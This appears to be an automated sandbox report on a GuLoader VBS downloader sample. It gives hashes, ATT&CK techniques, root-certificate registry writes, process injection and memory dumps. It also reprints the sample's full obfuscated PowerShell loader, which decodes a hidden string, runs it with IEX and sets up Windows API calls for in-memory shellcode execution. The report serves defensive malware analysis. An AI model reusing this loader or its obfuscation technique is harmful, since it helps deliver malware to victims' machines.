guloader | f7748ac5b87db57d1d7fef3e21b2cb7c910a013489c47256594ab26e0a959b7e

General

Target

f7748ac5b87db57d1d7fef3e21b2cb7c910a013489c47256594ab26e0a959b7e.vbs
Size

339KB
MD5

6af7dfbc2f5a867f11b8adff1150b5ba
SHA1

8e1d49a3856c57da40973102a96b892a31dee7f6
SHA256

f7748ac5b87db57d1d7fef3e21b2cb7c910a013489c47256594ab26e0a959b7e
SHA512

cd4ea26ffc7b60baf9d92ac64f02babec4a2d93a0bdb4d8d81d95888d83bb5183a8ba8e953fc5f3f264dbec4f239d4f4023825886be022503a6cfebc861ce1c7
SSDEEP

6144:dACvjkhn6pTmKLnbMhZYAEwISL7+qhMRRGdIf5fjeIdnB:dAC+n8SKLnEyc7+sMkoB

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

10 4808 WScript.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
10	4808	WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	WScript.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

3624 powershell.exe
3624 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3624 powershell.exe

pid	process
3624	powershell.exe
3624	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3624	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

WScript.exepowershell.execsc.exe

description	pid	process	target process
PID 4808 wrote to memory of 3624	4808	WScript.exe	powershell.exe
PID 4808 wrote to memory of 3624	4808	WScript.exe	powershell.exe
PID 4808 wrote to memory of 3624	4808	WScript.exe	powershell.exe
PID 3624 wrote to memory of 2600	3624	powershell.exe	csc.exe
PID 3624 wrote to memory of 2600	3624	powershell.exe	csc.exe
PID 3624 wrote to memory of 2600	3624	powershell.exe	csc.exe
PID 2600 wrote to memory of 2512	2600	csc.exe	cvtres.exe
PID 2600 wrote to memory of 2512	2600	csc.exe	cvtres.exe
PID 2600 wrote to memory of 2512	2600	csc.exe	cvtres.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f7748ac5b87db57d1d7fef3e21b2cb7c910a013489c47256594ab26e0a959b7e.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4808

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Raillerendes = """OmostABermmdHavebdFunni-SiddeTSkovryTavenpPseudeFilet Waitr-Moll TGhostyApplipselvbeOniomDSkrppeDobbefSprutiIntegnOptaniGladdtAssasitierloHindunAmeri menth'Agog uUffossHerreiNonornArtligHiela ArveaSInebryOverdsNomogtFrgeteSpademDoari;SkylduBoonysOrdenikamfenBevgegSchoo OverjSAscenySvesksLathwtBrigaeUndermTellu.DeligRPhoneuUrovanSubjetSalgbiRaacrmStoneeCentu.RegatIIolitnNitratIneffeKalasrSkyggoArctipraabaSfibereChaetrSyncovGummiiTsenacDampseSunetsCasea;Ctge pGlairuEleusbUstemlMineriPackecShred UncensnonvatOutstaSuspetKomitiIndtjcTrave SknnecbunyalPareeaUlemasHovelsKunst EnbaaUnedtrbBlokaiSfrisqOna CuProclaclunirunperiGraenaMorgenArbej1Brat {Ordme[SuperDSurinlFrafalKlaveITubermDiasppEnkeloWivanrBevgetsdlad(Carte`"""PublikfundaeAftenrMeeklnScreaeTrilllIndby3faire2Belin`"""Ename)Super]solilpQuartujollebMeddelFrijaidernecLeuco scampsAlfabtTisseaKerautInteriCamercStrab TobiseUngdyxImpretdebareBlastrSjakrnNeutr KondiiIdolinPoly tSkill FladsStumbleLandstUnaleEBruttnKattevDampbiAntitrCand oGrowsnLovkemIntereDrslgnEllevtLotmeVDaekkaRevolrHjertiBroddaSketcbcertilForskeKathe(reaktiHjertnPhenatPhoto NnsomPKailyhStileaBradyeSkulknBattl,BengeiBogklnSo Putpjokk JammeLLimpioFruitxAnthooKontosUnpar)Pooft;Smitt[OverpDCrowsltechnlTelefIUbetimUshabpInderoTaklirJornstDirek(polre`"""IndviwActiniPressnPlovmsCampupPektioBacheoLignolStrat.RmnindtesturKraftvUdspe`"""Flee )Lumbo]KlasspSimuluDetenbStilllJulemiSnitccFolke DagfisstethtDigtaaMosertKaerkiMeloncrevet FinnieIagttxUddritIntereRiflirAdditnRashe EmbaliSejl nLnkontSubce bromcECertinBrugbuAgatemHalvgPAhmedrAktieiSatranIndkatTjenePGenudrAlkohoUnconcTrembeKursusFingesHumoroFrg TrTetraDLedniaAfslutNdrinaBelshtdeperyFinelpklumseOverssForle(AarsaiscopansoldatKejse TilliSAccoiaOphavmSuperlAerog,AsbesiBataanmarketEkste LifliAMushrnOxalitlivsseAlder,tabskiParasnCallitJernm UnnorITellusSsonshSeptamNeuroaToccaeSusta,SelveiHenlanPrevotHumrf ThingPStifteLithilVeinatAfstraWhang,Sond iKritenUnzontHjert BekraTStramoDispawIdeol,GenskiNonnonYppigtProtr TolteCUnttroLejliudispulTuninoPlsebmSpeci,TeleoiGestinOpsumtSumpg TransKSammelUdkkeuStandmBrackpGlori7deval0Georg)Smrin;Adels[AnilaDDjavelCallilNonveIKatabmFaciepTenenoAnsvarudviktimper(Uncof`"""tommeuLumacsChloreMusikrGulli3Creat2Prima`"""Provo)Cecch]TrovrpHypnouTarasbAstrolSlnggiSpunncOracu BecomsSnifftPhageaTomkitAdganiWhirlcnight SkyrieKirmexoligotLaboreLavenrBrominSkarp MustiiAfholninexptMedal OverrGMaskieKonomtUnfixSStorkcLaborrChickoLeverlgenbrlCalotRfortraKlagenStngngNonreeForbn(LydspiRstennTvrvetSpeci KnaphamodvinFinskvPyrogeEyestnYippidHobby,SpunsiRelinnPeerltPorte RoystTJoculiAngiotNedlg,ForpaiKns UnNeurotHotsh FolkeBHeraceAdvermSaithgWansotFumag,ExsufiSouthnLigkatAprax DonkeCExprooTraumsHepatmHastvoRelat)Sphen;Murmu[EmigrDUdhnglGbakklVideoIKonvemEjacupKaravoRetmsroreodtPerse(Tropi`"""ThundkUdspreDatabrNowhenTraiteRebstlBreas3Skift2Seawi`"""Ufriv)Under]SpirepMarrouUnescbFrifilSvaleiDdfdscChole TormisFartbtCarilaIndtjtskkesiMogulcMinim BedaaeSkambxDispltUdmareDandyrCarlinOvere fatteiSmallnNonsutDybst MistrSGrsk eStrejtDksskCPosseoDupskmMaintmFarciSKledgtSpildaStradtChefseTungt(NonpriKamiknBurnitFodbo afrusMLetsiuDecimsBillsiUngtjcYanat,BaskeiBydelnUnebbtQuist upgroUThrenmAutoriFilmsrSydamiNorma)Hosst;Unsta[ElectDBhowalplashlAhuehIIndenmTrapepSizesoCommarstuditUpgra(Vgkor`"""DeadfgprodsdMelliiDubbe3Matri2Turis`"""Misfo)Lully]SaltwpStanduKendibhemoplReferiSalmecSubst PhacosRatihtLysinaMetamtUnderiSmagscOverh SemafeSuperxGleamtVha PeLaughrmonotnNutri BolleiKimminOffertDisse PouchGEnergeDuetttRuderTBkkeneTrypexSupintScuffCIgnorhAnuncaUnwarrChetaaHase cFortltImpuleBurlarLagerECimbrxIdolatUnequrBartiaUnder(FabriiFenesnEngeltOrbel BrekrSAdwarhSprgeuad fonJorun1Kolds6Frnde1Deici)Brodk;aligh[ElskoDImprglMisstlUnicoIStakomFrilapRegleoSerjerAfgastGrump(Mosle`"""RnkefgAntiedBjrneifilia3pigta2Overk`"""Medic)Flok ]SandwpArabsuEwderbRoedolfjerdiAftrdcNomen VellosTopattKonceaPersottuxediGaiascCoeru SoegeeStowpxStriktIndkaeYpperrFlygtnUreel DismaiSammenSerietProte CanoeGAskleedasketElskeFPolaroTemponUdplytFaux LExhalaDanilnForetgDroneuHyposaByraagOpenceIslanITransnJonglfAzocooMolin(barytiRotunnEclattopper Pads OJoubavPlanleSprs )ozonl;Pensi[MaterDCentrlBundflBane ISpirumHesitpFrivooJuvelrDatamtTalar(Fremd`"""IlleguTomatsRansaeAmenorSwelt3Auxot2Subse`"""Skrat)Untot]BrdebpKontruJabbebInterlGruppiDundycMatth equilsStnintAustraUnmectKondiiStjlecGgegu SynsfeJvninxHypostDicareTransrIrratnTypen ChordvPecunoCivvyiByomrdPlatt GardemPolygoNasotuOvercsGermaeSprog_MissieModspvInsuleUptilnReoxitFalds(KedeliIngegnSubtltVarml LappeLBissoaDenienDistrdFrysesGaybidParts,SteariSonysnoksertSubha PrecoVVolcaaSewernOpvarePreen,FoddeiRorqunSocintUnsom KalipPVvstyrChampeenlarsScapeuSikke,CreatiSpeednAfgratspads SpredRSelvhehomeoaKavalnRallunAbbas,Wick iNonlunEnswetBalle ArkivRAntiduPletinGrupptNonma)abnor;Douci[ReoutDTonsolEngralKohisImechamCartepSubmioBoomerKaraktScoop(anapt`"""EposeABalg DDeuteVskattASkosvPHoldnITegle3Calam2Boxwo.ForurDkaritLmycelLTelep`"""Trans)Entre]PhotopVolumuShrufbChanflinciciJodticrutil SurmosTouchtSulkiaHomoetindseiFrakecBehav SeedfeBestixBeskftVichyeSankerCypranAlder SkiagiKjrulnBocedtSlutb MonitROverseMyonegLavenQTrkpauRepayePetunrUnavnyAposeVRedheaSnyltlAtlanuIndkleOsteoERecomxTekst(ThundiPiurinCalfhtWindy SkrivcSamvioHykleuSkillnLectitProsp,FossiiOlivenOutswtLyric Undt mRadenaBottsiMalle,AgariiGodtenAloewtrvene GldelDObligulindblFortrlrokadeGldes,PapabiAtomvnTipistPriso FangeMArkiviAlbuerAtomkaMerudtPosseiPizza,DuettiDobl nKeel tBefor NoncoCBjrneoOmvursRacinmSolde,ZaniniBusstnDyttetSkrue VindiSWilheeCaragnFaldesInforifossufJudah)taxif;Confu[ViduaDForhrlTribolSyresIportymHealfpmaksioMailsrMenedtDical(Threa`"""OverfuPlanlsuncoreJozetrAllin3Centr2Pread`"""Trich)Sampl]meritpOpblduEfterbOpraalProduiMntuncFutur CyklusPotastAndelaSystetStrudiegrescMinis CentaeExuldxVaerdtJoannegrafbrRelatnAfpro DelatiunoccnBelaitKapit HeterIVervenDittesNonfieBroncrTrolotLdrevMTernaeSpndenScopouAfskn(MicroiEksisnGenevtdinky VanskSPedanuFagudlsuler,RysteicocknnStorvtPignu MesioEgenpavbetrdoTaksa,KultuiMennenRespitLedeo HandePBidrylBuskeaDiacriOverhdlatif,SkaffiBillanFinantMtrik TyrolSFetaoeEgalirBlindvTurbo,BulbiiApprenUnrestSubpa OpiumHConveaTrekavPseudeHrelrlHogli)Gldsp;Inter[StangDPoulilbestelAfsluIForskmSpreapluftaoSektorWildwtIrres(Skyri`"""PicarkHistreWriggrHandenJuviaestrubldagen3Ven H2Indle`"""Tanka)undes]TjekkpAlderuMiridbEcclelStimeiIndlacPrere TudsesDiskutSkibsaVippetTritiiErobrcSoliq VoetseFldeoxOophotTabeleRapkfrHeritnTheri RifleiSportnFjerktbille KrysaVAmantiembowrNonprtEveryuPhotoaLaboulHespeAHelbrlOxbitlAfteroBaroncTilvoEPersoxAreol(SquatiOrrownSpilltgotha BicorvCompl0Parke,BarneiGradinMetactVagin SaddevDeedb1Maked,GenopiHelicnRessotIndsk attacvStraf2Tilba,NevusimellenBarettOarfi SalubvLamin3Yngle,SknliiUtugtnNunbitEbull KlipfvLinie4Forma)Hoved;Recry[AischDVoldtlBagaglSheveIDaisymDiurepVirksoRoselrRemattBortf(Inqui`"""QuinqkIrreaeTilkrrbureanForsyeRowdylFluid3Unass2Robin`"""Parac)Dilat]HektopAristuStudebSortilHatteiParamcPatro DejkrsCollotLogfiaSkramtcarvoiUnmarcSchoo OpspaeLucubxPirattImpreeLeewarCroppnSgsma Pinx ICurtanplacktFlaadPStriptFlexirUnbil VragrEHls Bndame uFamilmCatalSSorelyForflsDimertBygrneSkrmrmAfstdLFutiloInchocColluaforvelSommeeGlandsEksisAOvert(BeeheuNectaiKantnnNoncatJomfr TypehvGavnl1Valut,EstiviToilenTidvitBlikd delesvUncon2Layou)Brnei;Tempe[afstaDJeaablArbejlBindiIBitstmResetpBdelloStaberEkingtLarme(Brand`"""PrejuwVodouiAlabanWhittsVsenspLilleolituroRustnlSubve.UdgivdVandlrafmelvPigeb`"""Overr)Rundk]VidtspFulmauOxidabunderlBumleiWiddlcUdse LancesHaltetRuralaWoodktStyrkiTredocDecad PiggyeMaltnxHalbetMagnieTarnarVenernGlunc AntieiSaturnCoevotMislo GallaDRnevieCorpolGammaeCrooktMusopemoradPUnfluoStenfrOveratPumic(OmandiEksamnUndertTirsd BosatMMaskiaGummarSteencClodhhsphra,TuckeiGastrnStenltDeaco TransOChallpArgumrRendy,PrismiPageunRenowtInter DrawsKtyfoiaBogenmOpsta)patar;feu m[diffeDteleolhugnilIdrifIAlopemPansrpNedgjoVaganrHauratDruth(Jazzm`"""ArachuBrnebsHorteeJanosrEmbed3Opsig2Ramle`"""Ulovm)Inval]VocalpSamekuMediabGametlHoffeiHaarfcRokke PeriosKansltunricaHulhetmediciStangcCatyd FirkaeHazelxtubertMoodiePrefarKommunMisex LaaneiDeplunhimmetRefus TabelSTeknoeEnogttDepreDRetsklTophngCisrhIBermmtPopulePpi FmBotswTUsbekebassixSupertafskr(SalteiIndeknDispetSagsa RelatSVisuapAilereAnosm,SysteiBlastnDesartRetou DiagrPKonkuoNoncodSminkaEksdi,ImmeniInternGodbitLatom AppreEunspalBrydneAnaps)Coped;Decyl}Pleje'Cirku;Compa`$DidapUbookybInteriFiertqAgitauAmfitaRecaurProtoiAlgotaLithonMaart3Kreds=Musik[GonzaUAprilbHvirviEmanuqaftenuLysogaBrewerPdagoiSkdenaDialonGylde1Forfa]Chalc:Komma:LagerVSemiqiEuroprIdoldtMicrouStaalaWestwlJitneAmoxo lPhililCigaroSpulicanalyERisibxbldgr(Indvn-Oktan1Kreti,Reine0Nonpr,Taftf1seism0Skatt4Tulla8Hw Hy5Tenuo7Rundp6Colov,Bbs A1Spiri2Intri2Under8Hjsso8Melle,Snees6Paddi4Gasrr)Hobby;Pleni`$SuffrLUncraeHarnidProstdHaandeBardetagglu=Monol(TartaGSociaeMyg CtTords-PelleIGrnsetNavneeNonglmKronbPSkankrstrmpoRigsrpSamekeCrackrHydrotOxytoySocia Koldt-LftenPScryiaHistotAxofuhAlche Fodtu'AurifHDimerKSarruCFrakeUTwist:Fuske\pladeRCadeaaLevigaArrannnonlioNedflkOleogkJournePrejunStruk\SparkTclaudaEscalaChillgHyperetaarehStraboHovedrStabinplowfsatlet'Mongi)Commi.ManicMFlueseSkrmmdNringlBigambSyrupeBijworNonspeTetra;Nords`$GeocoBStresinusselAffrelGenmaeSkabetAkkoltMatkarInspeiParcecAnklaeUrfolrMilienVikieepullo1Tauro8Leafb4alarm Vendi=vanke Kvgpr[PavenSAnticyFantasBilletHelheekontomLaird.BravuCStramoRaagenHoin vPardoeVoyagrAvisatSkumm]Zootr:Lasci:UnhooFStninrMockaoGrossmMulisBBindiaStiklsOophyeVeikk6digra4stranSCinnatPersprRehumiRedelnJudicgDysme(Sulte`$WhiteLAntoneFotohdInjecdAnonaeBdetatUnqui)Copre;Purpu[ElvteSMosaiyUdefisAlgertCoenoeRigsrmMakar.HampeRStikfuTreventilvitMumieiGennemBiofaeJusti.FiskeIChildnPrefotVaaseeMidmorSdvanoDiagopTilsySPolyseVellirTaraxvUkraiiInconcUnderepoecisAnfrs.PitprMTetroakritirPuppysCussehCanbeaTrninlToppu]Termi:Gravi:OkkerCudgruoHierapSkulkyNatio(Luteo`$UngelBKrimiiVedlglhelnolFibroeMinortIsbjrtLejderScieniYugascDrifteAntikrModulnLejebenamar1Chicl8Ravag4Teles,Deleb Vitic0Taans,spill Hyper Galli`$VenneUTvrfabRodskiJammeqFlettuIncanaHyperrOleaniSugetaStabsnstore3Rld N,malur Stran`$MiniaBUkunsiAcesclArgollDekoreTargetSpiketOpstarBagstiAldercSigneefilamrInternFlleseStyrk1Prere8Train4undif.OctilcPlanloDuftruVidernUndertBysac)Dansk;Crass[GgedaUOverfbSynkiiRulleqAvissuWalesaSeptirTenneiFiraaatonefnhoved1Artsn]Uncon:Telep:LittlEScintnBedrvuGennemInsemSCanvaySpokesUndertDryadeSjuskmVanisLHalvaoUmppicResumaChoralHonoreGenfrssidelAObser(Butin`$HalmlUVindhbCarleiTransqOphthuinvaraSalvirMicawiKontratiresnKrepl3Pyrog,Defil Acule0Syphi)Primr;""";Function Ubiquarian4 { param([String]$Baghjulstrks2); For($Unstressedness=5; $Unstressedness -lt $Baghjulstrks2.Length-1; $Unstressedness+=(5+1)){ $Ubiquarian5 = $Baghjulstrks2.'Substring'($Unstressedness, 1); $Forehood = $Forehood + $Ubiquarian5; } $Forehood;}$Baghjulstrks0 = Ubiquarian4 'ReforIWhoreEMyosuXTilra ';$Baghjulstrks1= Ubiquarian4 $Raillerendes;&$Baghjulstrks0 $Baghjulstrks1;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3624

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fotiwzkc\fotiwzkc.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:2600

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD323.tmp" "c:\Users\Admin\AppData\Local\Temp\fotiwzkc\CSCCA1B719B11046EEBA11B2C9E7B6C094.TMP"
4⤵
PID:2512

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

1

T1130

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESD323.tmp
Filesize
1KB

MD5
2f03883c3ee2ee56372e43cbcf5f61f2

SHA1
91b7d866e212b10263ce4785bbdac397d6578751

SHA256
7f6d06fd9f83439802f7d7906752b7379b0bd25463fd47d84b04f6a3e5099f99

SHA512
9a3d87b59bdcf4f604eeb042c4d1ba597efe7f3bf3587714d7405f82266ac803aec0dc232bb12f848316f07e310850fc145eff8d4cd74263d7e6af784f296216

Download Submit
C:\Users\Admin\AppData\Local\Temp\fotiwzkc\fotiwzkc.dll
Filesize
4KB

MD5
9918278066122f294f6e41dc9f00db30

SHA1
eba6a7345fa43eb422c360b0658e72ce49a6bffc

SHA256
5f0f0e620f199317aaf63dc2a16d78bde1e3930400bc88ac3ffcab3653c14589

SHA512
4d1d8c78fccbaed433a1f315efb0c1a65f91b2e72be3303cbb381e9a2eb23e01aa412a6688a1b52fe197578bfb0d5330ed4c093d0bccfc22bfeecb44c76b42a5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fotiwzkc\CSCCA1B719B11046EEBA11B2C9E7B6C094.TMP
Filesize
652B

MD5
af1780738c82dd2cae2fb47d096c46f2

SHA1
5eb1921d8c2ab25b53b79efaceeb33e317e56928

SHA256
535ab40be57f9dbc5cf22631a3ff65d903583e8510cb37521d4924aed3364cbc

SHA512
aa7b4dc4dab5edf4788ab62e14c5513c67d4ef1d8ba2c0c09c12ba1524b729f29baf48e6e550f8cea776efcd85252c00ca74770d6431926ff73315485ec97767

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fotiwzkc\fotiwzkc.0.cs
Filesize
1KB

MD5
07f5f57e8d8cffc890e02735a7a28f67

SHA1
8dfc8967737e56258dc777598b151f6ad78065e2

SHA256
edd5cc9b9e60df9de211965edd2078eb72addd7884e769fecd1b5b7a2faaa69b

SHA512
3506613fd8e3faba8336868ee4b7134bd740dfbae777b53fb3bf11a1aa89cea9ad491b7d0ab35b7ae0426f18d66e1f14f002a503e25a88ab33243e033778be4e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fotiwzkc\fotiwzkc.cmdline
Filesize
369B

MD5
40abdd02155404dec57ed567fd5c5919

SHA1
1e151e96b09d63e5edf3ed4fe8897788fa8cc796

SHA256
5851b5bd7bfd678f5af54aae249c43db3ad5e7bf9df6ebf5fcbaca4fe90887f7

SHA512
fa44e0f755e4003287ae9e85aa99779742ef44510d564b71c122daf4e00353625f740bfad57a4322a253060be11a5b268b53e1c15a608bd61a3b9c2e356a8aca

Download Submit
memory/2512-144-0x0000000000000000-mapping.dmp

Download
memory/2600-141-0x0000000000000000-mapping.dmp

Download
memory/3624-135-0x0000000005370000-0x0000000005392000-memory.dmp

Filesize
136KB

Download
memory/3624-134-0x00000000053B0000-0x00000000059D8000-memory.dmp

Filesize
6.2MB

Download
memory/3624-139-0x0000000007AD0000-0x000000000814A000-memory.dmp

Filesize
6.5MB

Download
memory/3624-132-0x0000000000000000-mapping.dmp

Download
memory/3624-136-0x0000000005A50000-0x0000000005AB6000-memory.dmp

Filesize
408KB

Download
memory/3624-138-0x0000000006240000-0x000000000625E000-memory.dmp

Filesize
120KB

Download
memory/3624-137-0x0000000005B30000-0x0000000005B96000-memory.dmp

Filesize
408KB

Download
memory/3624-140-0x00000000067C0000-0x00000000067DA000-memory.dmp

Filesize
104KB

Download
memory/3624-133-0x0000000002940000-0x0000000002976000-memory.dmp

Filesize
216KB

Download
memory/3624-148-0x00000000075F0000-0x0000000007686000-memory.dmp

Filesize
600KB

Download
memory/3624-149-0x0000000007550000-0x0000000007572000-memory.dmp

Filesize
136KB

Download
memory/3624-150-0x0000000008700000-0x0000000008CA4000-memory.dmp

Filesize
5.6MB

Download
memory/3624-151-0x0000000007450000-0x0000000007ACA000-memory.dmp

Filesize
6.5MB

Download
memory/3624-152-0x0000000007450000-0x0000000007ACA000-memory.dmp

Filesize
6.5MB

Download

Analysis

Sharing